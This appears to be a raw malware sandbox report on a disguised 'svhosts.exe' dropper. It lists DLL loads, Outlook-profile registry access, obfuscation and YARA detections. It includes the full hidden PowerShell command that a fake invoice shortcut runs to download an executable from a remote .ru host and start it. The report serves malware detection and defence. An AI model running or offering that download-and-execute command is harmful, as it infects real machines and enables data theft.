Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Users\user\AppData\Roaming\svhosts.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Inovice_3_ETH.lnk

LNK file: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Roaming\svhosts.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source:	Binary string: costura.dotnetzip.pdb.compressed source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.dotnetzip.pdb.compressed source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: svhosts.exe, 00000002.00000002.2290132290.000000001C350000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: costura.dotnetzip.pdb.compressed8 source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, cLxg1VivqXKPVdAKiHb.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, RdxPeP7Eax71XOM6ZsE.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 2.2.svhosts.exe.f70000.1.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 2.2.svhosts.exe.f70000.1.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 2.2.svhosts.exe.f70000.1.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 2.2.svhosts.exe.f70000.1.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 2.2.svhosts.exe.f70000.1.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, BvK8wPBQakvfJfnIbN.cs	.Net Code: OUtql2FQC4 System.Reflection.Assembly.Load(byte[])
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, AssemblyLoader.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])

Suspicious powershell command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe'

Yara detected Costura Assembly Loader

Source: Yara match	File source: 2.2.svhosts.exe.fd0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svhosts.exe.1b280000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2067785237.0000000000FD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2265623390.000000001B280000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svhosts.exe PID: 7548, type: MEMORYSTR

Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9B8A77E4 push eax; retf		2_2_00007FFD9B8A77E5
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Code function: 2_2_00007FFD9B8A7D8E push ebx; retf		2_2_00007FFD9B8A7D94

Source: svhosts.exe.0.dr

Static PE information: section name: .text entropy: 7.99673459109272

Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, fjjqGO0hvSRjxJxcUeI.cs	High entropy of concatenated method names: 'AF20x1YmIB', 'wsZ0taVnKm', 'xbH0J6RXP7', 'Y4t0W2AgSG', 'S1H0L2l8pg', 'Rpc0EiHn6i7klJ8lFk3', 'SoMMBJHCqZdWefTJ1ai', 'xO9sKqHEj0qoaUwVNWw', 'zSe0NdHN0VMTUoFnRKK', 'EG9CmjH7QVioNuFmcHO'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, c76rLuc1OPxJNrkrpt4.cs	High entropy of concatenated method names: 'keAcv8DI2S', 'VJqcrmNP4P', 'v2XcoWpK4C', 'F67cpAE39U', 'ln9cQ6AqHt', 'Lmtc8nNuvd', 'zrfrcPVQITEYEwYMurR', 'CIU0Q3V86qxuaXBOkGa', 'g8HtwVVSy0O1gIBscMM', 'OLYwydVHFE15H7ikuPF'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, KVctFT4fKsCBP9YdbF1.cs	High entropy of concatenated method names: 'VDkO2KEDY9', 'Mrey0BSyl0KUPrCEJqR', 'PQMykiSmea7nKZnd3nc', 'Os0OleVK2y', 'zXsOqPFu4b', 'mhsO5SYJK6', 'PM3OAqAXns', 'S9YOGrF8oZ', 'etoOXNM2fw', 'PI6OaY2a1V'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, LWicU8cUFDjquI2bNSm.cs	High entropy of concatenated method names: 'i8jctrmqyh', 'cAccJfZV5e', 'I4ecWd2eAv', 'mR7cL8Mq3f', 'G9W0SRVEIAydilT8RWH', 'CG028hVND7k2q7vm85T', 'Uj3oQMV928muJGp9AfO', 'DYvHcAVBYEVFy0AesqZ', 'RnwQ4fVnUnZrVadaGFi', 'b9g7G0VCOmfur5CYTPx'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, capBNy2GiHYRX4XiCVP.cs	High entropy of concatenated method names: 'atc2ab3cZA', 'F3A2kQSAkO', 'c3H22PYfPM', 'hgn6E4QRQb9J5k3WDBL', 'VRyBJGQyEUGsB5N4iIj', 'ei7qGdQmpRElcGIMXyg', 'jiws5fQgYujAI40bmHG', 'R1PtvqQikPAlI0J663o'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, QTS7vvOYTtKRPZYqZ6A.cs	High entropy of concatenated method names: 'aKrOb2ldHD', 'VRuORfiiCU', 'gTJOyHBlAl', 'B7rOmrQ58V', 'peCOgFoTOf', 'Fy5OiqAhlq', 'iAhBbhSoFBIwQ7eZvg8', 'beWHlLSpAlnW63Hhc1V', 'eL5XI1SQOTQufbpSnT7', 'jEgcWMS81YvkK30nWyT'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, qweCvpqeoUr8cKH2XNm.cs	High entropy of concatenated method names: 'IhbqUwoVHD', 'YgO0xmvB33tAr3oxLHT', 'bdQEjZvLlbbgsBL46Iy', 'Q1jauOv9nWJWb6OpFaP', 'nVbtZsvEqp1OKu7H4XX', 'O6UpefvNJCIarRdkNfp'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, Y6eVC24FQ8H9gXRSZrT.cs	High entropy of concatenated method names: 'nvc4rsFRKL', 'HYqqif8VFHW7pJrpKCk', 'tuqhaI8PVdl2Tp3PTAa', 'H549e78jwTcjhtE1xd3', 'XgE1x98I5MwKQeHup3Z', 'jqXbHd8M7QUoyB2rgKY'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, GADkTJGjt66Zhh45eWP.cs	High entropy of concatenated method names: 'vhYGMaoZlQ', 'DCjGdVI5Ou', 'CDeGuqTbTc', 'LsdGeaKurB', 'gvRGh3utUS', 'uf5GUReBLu', 'e5UGx63nGa', 'ia0GtkAfL6', 'mcyGJqOQFy', 'oBeGW3k25q'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, lsLDSyAHWOyIGYCoPFq.cs	High entropy of concatenated method names: 'Mi1AVIkNUd', 'Cn4APaFTI5', 'IbEAjZRtid', 'Sj0AIIcF6m', 'W80AMsZy7P', 'SohAd3X2NR', 'DBtAuIHTRd', 'MRgtBYoFTWyoZcwpJbv', 'aYbZwJovwV99W5Jp7Xk', 'AAnWt6orjFoOvdE76sK'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, dHooNxRvjakWUVogZLS.cs	High entropy of concatenated method names: 'VFaRoK7FOQ', 'a9GRpELIJ7', 'sRUrMWjoKq5LXS12hdj', 'i6GNZRjpYr1uhriVWJx', 'CO6RI6jQ7NTYtB4RRqI', 'n84FpNjvxa4XHurbLIc', 'PnyAnsjr4juUyJhhNTP', 'pxsLT0j8glPdfa3EeCE'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, gQEQoo2VcsIuCsZJLev.cs	High entropy of concatenated method names: 'PjK2jQmhWI', 'vvr2IwBejI', 'CMK2MaSywn', 'XZN2doM9bc', 'svC2u3T3ds', 'r8X2eixIVy', 'hb42hIvCCO', 'ddo2UQisur', 'rU22xhdFkl', 'aSJ2ty6ZCQ'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, sG4wt3YlZNNtpsfVAHe.cs	High entropy of concatenated method names: 'wTsYayCV7O', 'dPlYkYtZwb', 'S2EY23V3Zw', 'kRgYKAa4K5', 'zSCY4eUUMc', 'apW4E0P01TCE10leSTd', 'e7tOeNP3WgHvQ6cIQC4', 'sw1Y5pN8dE', 'GL1YAqxEOM', 'NJvYGkVPwM'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, RQaSWVOoOVrpvJ7k2mi.cs	High entropy of concatenated method names: 'oEoOQGnUGx', 'JZpO8e2Zc2', 'NsCOSNgHBr', 'a78OHgXYGZ', 'tTROD1NmCe', 'z60OVAsa8D', 'EGJj4rSd88ge2fwqxeN', 'ebwo1WSuD2Es4xAkS3o', 'uH9Bs5Se4PdZ5rHy5Bv', 'oeksrDShdoLlqmqaalr'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, BvK8wPBQakvfJfnIbN.cs	High entropy of concatenated method names: 'F11NuHd5K', 'uSenOUUWP', 'C9DCxVlsp', 'Qq47TaSfr', 'Vq9fsKi2q', 'skwzYHmMj', 'OUtql2FQC4', 'jLjqqiHC5t', 'Nqyq5jxaxX', 'Y9KURtvZcSB4OPWRhtp'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, brNUMWZI1ElyPmCgnRu.cs	High entropy of concatenated method names: 'i1GZdH0Avl', 'dqnC2bDfGtBT4BE99uu', 'YcJJ7eDzTcAw8h9LEdZ', 'JjZjU5VldrRIBMSuhCo', 'PZ01fOVqkafjy3O2wlv', 'HBk1lHV5t8YNkFfiKKk', 'TGxnAVVA4S5GyGBbThG'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, IrLmSMG0fWWgKF2TQDw.cs	High entropy of concatenated method names: 'opRGs3jyJv', 'iDAqBhplRSoH1TYDnLj', 'bJrh4spqk8AnstK7WcS', 'svcdcqof1Bo7kSJUK0M', 'es1ZYmozgwgiZJ1w3eb', 'j7QIOgp5lFpNwXXkVvn'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, RnY12TA5klXPLyiySWo.cs	High entropy of concatenated method names: 'beqAGma09m', 'eZ7OHJrUQ9CjlHskXuA', 'AOHyn8rxiuTc1VL3V6B', 'uk5ICRrtpO1ggnvZBQJ', 'hqFfMZrJ5cywgZNg8nu', 'd1d0JlrWMyAfNcLOntG'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, wpDAL1bFuWcemcdRqgf.cs	High entropy of concatenated method names: 'Dispose', 'i9sQ4xPLcpWsW1xeLRR', 'fRcMgkP9iaql0yVLpAA', 'hi0vKPPJqVtCrakcvFA', 'ktf2FjPWyNYn5gD3Znv', 'aAEqCjPBDkEnComCrNU', 'Fcr5rvP750hR2NqcMIu', 'K440g9Pf89ixy2w0RxY', 'XjsoV6jlQSq2cX13C14', 'bp5wpljqVN9ML7GMRAb'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, uycrb3qxQqQjSqdftZo.cs	High entropy of concatenated method names: 'XvHqNM8i4m', 'xkoskJrAuc4kQLMGMVj', 'qtn4sNrGS1gLLhIx9dm', 'bgrGX5rXHYrZB96kHEG', 'wmBqCda7RA', 'uqwq7y98uN', 'G0f6YgrkCiugKys1GG4', 'QvWUEpr2cg1jZ5Xr2wf', 'BFCfCsrK3L0NB4JXkoG', 'jnS5qmcacK'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, EjD3KIZhYgXxF43EgY5.cs	High entropy of concatenated method names: 'qEbZnAs6M4', 'GvKZCIodE8', 'ExcZ7EQK3l', 'mHJZf8yhkC', 'ctxZztLcjd', 'daPclw0mhE', 'pBHcqNFDfp', 'njbc5mJeQq', 'WWjcAgsXxA', 'jAycG17NjV'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, cLxg1VivqXKPVdAKiHb.cs	High entropy of concatenated method names: 'imhGt1I1Im3ufkwam41', 'PlTJGYIFh6TVNxujhVr', 'nLE1lFTMhl', 'BsqWOhIpECspVDi6fCq', 'OBfv2cIQtBukdT01ZJv', 'aukMsnI8EdPArDyUrvM', 'eMrp0sISmRmTMgBsk7y', 'g38PJ8K3c0', 'MAI1kVyT98', 'tir12s4ZQk'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, qXwNvgTDO5S0rFRG02E.cs	High entropy of concatenated method names: 'k5MTPTwBYj', 'trmTjIt6bc', 'AGEYk1H5N0i5J63YLqk', 'qumGAWHALTl1Mxp8nvB', 'FsoKxMHGg9OFwmdSFZ9', 'IatPhFHXwcyKWv9NbQV'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, w5VySpAKsAdWEyeyh1L.cs	High entropy of concatenated method names: 'vrcAgrkF6Y', 'DdH7oroAx4Ppccson9c', 'W2KNUQoGHhDJSw0KUJi', 'Ne3LyQoXnxIgvZ99OUN', 'BeyAOeJyrt', 'ABxATHyJRj', 'xqGA0krbeu', 'SaeA3l4aub', 'dTxAsIYxYy', 'h4vAZjAJma'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, TkyIPcTNhQ8Ovm9sZYS.cs	High entropy of concatenated method names: 'Dispose', 'y9YgafHQpjmGKFNspOe', 'rFiEGxHo4W1nhuEmSKM', 'WbvFqeHphbXrEhLNFjq', 'Paf2rfH81MWd0rpiu2m', 'I4MWZcHSGJqpw4VopnR', 'l6bXxBHjILZdecy1MRE', 'IqjBObHIU0jeo61ejhY', 'uVFwmIHdLT8Q2hEDn2l', 'n4BRSGHukFJU70Jl5Ph'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, EyUmHpZDAWAhWQsv4H.cs	High entropy of concatenated method names: 'kTTYgxC8A', 'hIxwQiU4H', 'p1ubTB1J5', 'aFXRLhwMe', 'i1YymCTq4', 'acqmXkc9w', 'tyygjXBgU', 'PWDiBxGL4', 'MisQgdFL5SrD4rj9naF', 'snv6vqF92g7BFBUM994'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, bydUEn1gUAnWL8Sm347.cs	High entropy of concatenated method names: 'oNX1HjqGxN', 'AYT1DJ7UPw', 'YMX1VstA8C', 'gBK1PBi2rO', 'rIQ1jGPqD2', 'vlq1I91W2f', 'gco1MENaQu', 'nyc1d7U8sY', 'ELc1uYyGYB', 'YvC1ePxDVd'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, ixlaSY2QcGIF0ZrQ9oo.cs	High entropy of concatenated method names: 'JaZ2SO2X7e', 'WAH4FmQ9joH5YHsHG7j', 'B8QnH2QBjbAoAjWMuvZ', 'w07JPvQELkVWdYsBoAv', 'm9kGYWQNkEuHC1SB86v', 'B1jMFcQnh6KA3va8YTx', 'R2N8iqQCssag00ptMpB', 'pW7Z4CQ7j6ILKNdcxji', 'PSLlQ3QfJP7EICD4dhK', 'Wohc4rQzH0OaPEfc2qh'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, WlMuBdkKbKfnmwLWtGp.cs	High entropy of concatenated method names: 'me1k12vXlD', 'NyBkFaulHD', 'SFDkvrRDRh', 'yPmkr33ZVp', 'mYckoq9URi', 'OaTkpZvcAj', 'c3tkQA5Z2D', 'n7rm1AQq83T7ss7mQYp', 'fLy9ctQ5F0ouCqWBvw3', 'xZAkOUFnA0'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, jUitfU32YZ4hZJ2eSoH.cs	High entropy of concatenated method names: 'NyqYwND3lVsYr1ku6Jf', 'EOxSXkDTlWomfSjLLyH', 'vpsi7WD0npQ7kgL9ZY9', 'xNP3b6undG', 'blgna1DZY8oX1kt9YAR', 'fuRI3dDctJUsIyacGdw', 'KRc3gNchLj', 'd6cn9DDwJ6jN1ahg4nN', 'IwLYktDbSOvQmRfuP09', 'utxMWADRAf3NeZD23CO'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, IBj3d7ZpmxOtqvjDy0U.cs	High entropy of concatenated method names: 'OPuZ8hvP8C', 'qAMZSXaPH7', 'cmgZHvrxis', 'sQcZDccxrV', 'aAOZV924k8', 'niEcnPDLFoYJUZXmZso', 'gbI44LD9Tj3ycnZABaH', 'sFer3nDBefsvHbAv7g2', 'vuSW3ZDEJsrpaLXyr7c', 'wWCXpTDNsR1y1Utn1cs'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, YJAGZ7icGnV2a4pdkrT.cs	High entropy of concatenated method names: 'TeyiwiH278', 'Xh0ibgLdmI', 'voSiR1XnEu', 'Rhtiy2wAIx', 'i2Kimce972', 't3OFepIXEm1CLjZofvn', 'yOab3jIaZnLuGdpUIJe', 'ebAkkQIk2goJ00IEAv5', 'aSEF3wI2Bcsi6UiDwrf', 'nhbGxnIKQ8xpn1cCxmQ'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, p2HRsp3Q0I4hnP6bNEB.cs	High entropy of concatenated method names: 'ifm3SANe8l', 'YVd3Hl8yrl', 'M2B3DQ82pX', 'K2orncDofFyK7VBiahG', 'jZaVOKDvkTunX7h5ATK', 'qgh8bDDrI2MCYGrbiZP', 'MvowXDDpkrnp48uws3F', 'DIoCS0DQHopsrKnPt7Y', 'snt9wZD8cAPxqsh4YWa'
Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, vwocD72mPkO9LGGkJbE.cs	High entropy of concatenated method names: 'F3Z21O50Sg', 'FcFWKBQutD8RLLVMWxm', 'BvCB46Qe6DjYxoMpT5H', 'KRNgELQhVThLQRkxZNG', 'UqphZiQUHIp4dmUrgex', 'nuGoWJQx9q29reswBlS', 'SUS2iW3sqK', 'MVx9dCQPUC31sYpl6LZ', 'cfq1jmQjnMXJBxOyhB2', 'uti2l7QIOKWqRmJ7c0H'
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, K1RuCWMqEInwVmF6E2.cs	High entropy of concatenated method names: 'c0FRS1419', 'mWRhaBDKE', 'i3lq2hgB7', 'uhPjwud8n', 'RGh0XQ3hplGH70Hxnbn', 'gu1li63rw0SSKrV7IZZ', 'G0Rk0u3RdT7VK7jE1Bp', 'JTcTI03qJT1TEMNsGdY', 'm3LZPs3j8cyvgMmIlaY', 'LVciuG3oklY5YecZEQU'
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, AssemblyLoader.cs	High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'gW0Me2yPerv8aYcPDAW'
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, RdxPeP7Eax71XOM6ZsE.cs	High entropy of concatenated method names: 'VCcU7ThMu8hAbvao7e7', 'ELHe9whrj0QsOKwmxHN', 'fKtajy9vQ9', 'hxTVI3hjm0OlJFQMIYX', 'Q21BKehoXbLkjXVqHGw', 'm4O3fkhTvhSOywBoZQU', 'xV5KJThnnmyZqoGksqA', 'libJtPhVeMJcjsVvlrE', 'LpDOZDhpxSGBhVDAW36', 'XJsGLOhDUqCs1164Qhr'
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, MJgK49WqHAoRPjJFa0.cs	High entropy of concatenated method names: 'AMZ2Ekyr4', 'zkZ0IL7Lg', 'S8Jwn4ZB3', 'O22Sb2D4e', 'alE1NdN5r', 'JGuIkk2po', 's7dU6C3IciZRQ9Iyo6G', 'xF59I13lBPpQCUtEnQs', 'XTLkS53E8L30K8Mhi8M', 'oYxS9Q3ScQNgsu2Fy0R'
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, aU1uiha16ZVCy9l7kEd.cs	High entropy of concatenated method names: 'zbVBJDAuiJ', 'eO7BYE82LL', 'Tl2BvDBDUx', 'ChSB7T2aZ8', 'fdpBOglr0U', 'lZqBajiATC', 'nvBBBQnDdf', 'ByKBAHSUWr', 'WAyBCHo4G1', 'gSpBiSL3D1'
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, sjnMkUl12Z4g6BMnTa.cs	High entropy of concatenated method names: 'A2rPgRfji', 'MfdzXp2Cu', 'egb4XhuEZb', 'HiV44lVaCp', 'PxE4KvY70y', 'WIn4fZXDWr', 'IvB4dyXFlf', 'zWA4mU80VG', 'tFZ4J6xIt3', 'lOY4YtYeBH'
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, HGYJHk7SXi7wQrUMU1u.cs	High entropy of concatenated method names: 'HfipGwGAyb', 'TF4cmlhs9rpZTIChf9G', 'ktDHNlhF04qg3704wZx', 'JygBlPhH3GqaoLGjfxD', 'BGMdo1htNG1Eaqv9y8p', 'avxsAwhbkYLp1aLCv34', 'lIYp7nhGboeJAVBDHmi', 'sMKkWmh5KscBO44BeOn'
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, CuP3rpoBx9ERdgnwOh.cs	High entropy of concatenated method names: 'zjfnwJLOj', 'P3nVVIqs9', 'AsfpkawBs', 'SPVDSMVBA', 'l0dQpu8hX', 'KbCLZS3oP', 'd0NUeu3fa', 'PchkmAEs1', 'cHUSbA3npB1jYqJuGck', 'FJUMIV3VxGluTFceIKY'
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, RUyZge7gYG34YLmgatn.cs	High entropy of concatenated method names: 'lS97xRSAHk', 'uyo762oOY4', 'zN5v4gRwueEwtlVon70', 'NFUaahRS1yaI5Dg1vxP', 'X9HLpqR1q5q7sEqkQSV', 'waGEupRIxmXLXQZi5iV', 'UgAa5TRlGC2PVRWt3pV', 'Mn4YU1REZrBPyOndacX', 'o7w9yXRPrXs4uO0ol3I', 'bo2M3dRzDO4CBe4O464'
Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, lDAWXR7hPZGrUF5br5l.cs	High entropy of concatenated method names: 'TNZ7jw33GY', 'AH57o0jd5V', 'Ymh7T1kRV5', 'zAP7nFNpMY', 'aix7Vw2fVL', 'OYhESwRAxk79NDLLYbg', 'tNJPyBRCxMniaSGIUbE', 'pXMB9rRib2KH4yKKLT6', 'B9fXxYRbo1B6wq2jGZv', 'jZoxpvRGk5FUnnb9fXU'
